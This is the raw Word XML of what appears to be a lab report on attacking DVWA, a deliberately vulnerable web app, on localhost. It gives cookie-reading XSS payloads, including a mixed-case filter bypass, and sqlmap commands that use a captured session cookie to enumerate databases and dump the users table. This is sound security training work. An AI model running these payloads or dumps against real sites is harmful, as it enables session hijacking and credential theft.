          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9326A" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D23D7F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9326A" w:rsidRPr="00454180" w:rsidRDefault="00D9326A" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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Access DVWA:</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Open http://localhost/dvwa</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lastRenderedPageBreak/>
        <w:t>Login using default credentials: admin / password.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>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Set Security Level to Low:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9326A"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Go to DVWA Security settings and select “Low” to reduce security filters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Reflected XSS Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9326A"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Inject JavaScript payload like:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>alert(document.cookie)&lt;/script&gt;  -- if Security level = Low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9326A" w:rsidRPr="00602FA4" w:rsidRDefault="00D9326A" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00602FA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00602FA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ScRiPt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00602FA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>&gt;alert(document.cookie)&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00602FA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ScRiPt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00602FA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>&gt; -- if Security level = medium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9326A" w:rsidRPr="00454180" w:rsidRDefault="00D9326A" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Capture PHPSESSID:</w:t>
      </w:r>
      <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Use browser dev tools or a custom script to retrieve the PHPSESSID.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00602FA4" w:rsidRDefault="00EB1BEB" w:rsidP="00602FA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Run SQLMap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00602FA4" w:rsidRPr="00602FA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit" \--cookie="PHPSESSID=dc23497a99a456cc7fd32e559a377863; security=low" \--batch --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9326A" w:rsidRPr="00454180" w:rsidRDefault="00D9326A" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Database Enumeration:</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SQLMap lists available databases like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>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Extract Tables and Columns:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23D7F" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>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Example:</w:t>
      </w:r>
      <w:r w:rsidR="00D23D7F" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sqlmap -u "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>target_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;" --cookie="..." -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T users </w:t>
      </w:r>
      <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23D7F" w:rsidRPr="00454180" w:rsidRDefault="00D23D7F" w:rsidP="00D23D7F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D9326A" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D23D7F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>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This dumps the users table with usernames, passwords (usually MD5 hashed), and other details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00602FA4" w:rsidRDefault="00602FA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009655B0" w:rsidRPr="00454180" w:rsidRDefault="009655B0" w:rsidP="009655B0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc195990386"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Screen Shots:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="009655B0" w:rsidRPr="00454180" w:rsidRDefault="009655B0" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking the status of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009655B0" w:rsidRPr="00454180" w:rsidRDefault="009655B0" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="292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rsidR="009655B0" w:rsidRPr="00454180" w:rsidRDefault="009655B0" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009655B0" w:rsidRPr="00454180" w:rsidRDefault="009655B0" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking of the status of the apache2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2927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rsidR="009655B0" w:rsidRPr="00454180" w:rsidRDefault="009655B0" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00602FA4" w:rsidRDefault="00602FA4" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00602FA4" w:rsidRDefault="00602FA4" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00602FA4" w:rsidRDefault="00602FA4" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00602FA4" w:rsidRDefault="00602FA4" w:rsidP="009655B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
